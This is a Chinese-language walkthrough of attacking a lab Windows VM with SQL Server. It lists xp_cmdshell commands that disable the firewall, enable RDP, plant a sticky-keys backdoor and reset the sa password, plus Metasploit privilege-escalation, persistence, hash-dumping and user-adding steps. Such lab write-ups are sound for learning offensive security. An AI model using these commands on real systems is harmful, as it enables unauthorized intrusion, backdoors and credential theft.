为方便后续操作，建议和kali在同一网段。
获取到靶机IP后，扫描端口，1433是sqlserver的

测出用户名admin，但是密码爆破失败
扫描目录发现配置文件
配置文件中找到数据库的用户名和密码
使用Microsoft SQL Server Studio连接，注意此时不是sa用户
数据库中找到密码，成功登录
尝试上传文件，但是黑名单限制较死，看到里面已经有人上传上去，应该是图片上传上去绕过，点击下载查看连接密码
拿到服务账户的权限，与Users账户的权限相同。想办法远程桌面上去
收集信息，查看网络连接情况，看到3389没开
windows平台一般都有防火墙，netsh firewall show state查看防火墙状态

netsh firewall set opmode mod=disable拒绝访问，权限不够关不了
利用数据库操作命令关闭系统防火墙，但是咱们不是sa 用户没有权限
而且也没有xp_cmdshell组件，权限不够也无法执行上传组件的操作
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Users\Administrator\Desktop\xplog70\xplog70.dll’
拥有sa（管理员）权限，开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell ‘REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
EXEC master.dbo.xp_cmdshell ‘netsh firewall set opmode disable’
EXEC master.dbo.xp_cmdshell ‘cd C:\WINDOWS\system’
EXEC master.dbo.xp_cmdshell ‘copy cmd.exe c:\WINDOWS\system\sethc.exe’
EXEC master.dbo.xp_cmdshell ‘netstat -an’
修改sa密码 exec sp_password NULL, ‘pasw’, ‘sa’
尝试提权

https://www.hacking8.com/mst-sec-lecture-notes/8.html
使用multi/recon/local_exploit_suggeser模块查看靶机可以利用的漏洞以及相应的模块
使用第一个模块尝试，target默认windows 7
提权成功
权限维持，使用windows/local/persistence模块快速进行权限维持
导出hash值
复制管理员hash拿去解密或者使用john破解
获取到密码后，接下来就去开启3389端口远程桌面过去
本来咱们获取到管理员权限后可以直接执行命令，但是shell返回不了，听说原因有很多
这里使用msf的post/windows/manage/enable_rdp模块开启，这个模块好像也可以创新新的远程桌面用户
nmap扫描3389是否开启,或者nc -v ip 端口
使用kali自带的rdesktop或者物理机远程mstsc
之前咱们看到系统有防火墙，msf搜索有没有关闭防火墙的模块，但是好像没有
post/windows/manage/exec_powershell利用此模块执行powershell命令失败
exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
使用第二个模块重新反弹一个高权限的shell
反弹的shell还是不能进去
看看meterpreter命令有没有可用的点，meterpreter命令https://www.cnblogs.com/backlion/p/9484949.html
search -f cmd.exe搜索文件
execute -H -i -f cmd.exe代替shell尝试获取终端权限
可以上传反弹的木马，然后利用execute执行反弹回来，执行的时候失败，太菜
使用vnc,run vnc打开远程桌面失败
查看本地用户组
查看远程桌面用户发现为空

尝试将管理员添加进远程桌面用户组里面
有域控的话倒是可以将用户添加到组里面
run getgui -e可以看到RDP已经启用
run getgui -u admin -p admin添加账号
post/windows/manage/killav模块只能杀防护软件，不能搞防火墙
![在这里插入图片描述](https://img-blog.csdnimg.cn/9c70a00a83724dd5试一下post/windows/manage/enable_rdp这个模块能不能添加用户，咋们之前看到过
看来还是这个模块强大，不仅可以添加用户，还可以将用户加到远程桌面组
net localgroup "Remote Desktop Users"看到已经成功将admin用户添加进远程用户组
rdesktop -u admin -p admin 192.168.1.119:3389连接还是失败，感觉是防火墙拦了
现在虽然拿到系统权限，但是拿不到控制台权限，也就无法关闭防火墙。咱们虽然有管理员账号密码，但是咱们不能直接去登录靶机，要是这样就简单了，咱们得用搞远程的方式来搞它！
不够好在有数据库，可以去拿到数据库sa的密码，登录后执行数据库操作继而来关闭防火墙。
爆破sa用户密码，但是无数字典过后还是一无所获。
修改远程桌面端口为27689的端口，也就是靶机开放的web端口
协议不对应，也不行，防火墙只开了1433和27689，控制台权限拿不了关不了防火墙。sa用户密码爆破不出来，系统库中sa的hash也为NULL。
key3:4d9d3q8v，admin:asdadwn_d2112用这些密码登录sa失败。尝试其他模块。
第三个模块windows/local/ms14_070_tcpip_ioctl用来提权到system
第四个exploit/windows/local/ms15_051_client_copy_image也是提权
剩下的几个网上搜了一下也都是提权的 模块，看来防火墙终究是关不了，还是太菜！
meterpreter能获取，但是shell获取不到，sa密码不知道也爆破不出来，防火墙关不掉，知道怎么关的师傅还望不吝赐教！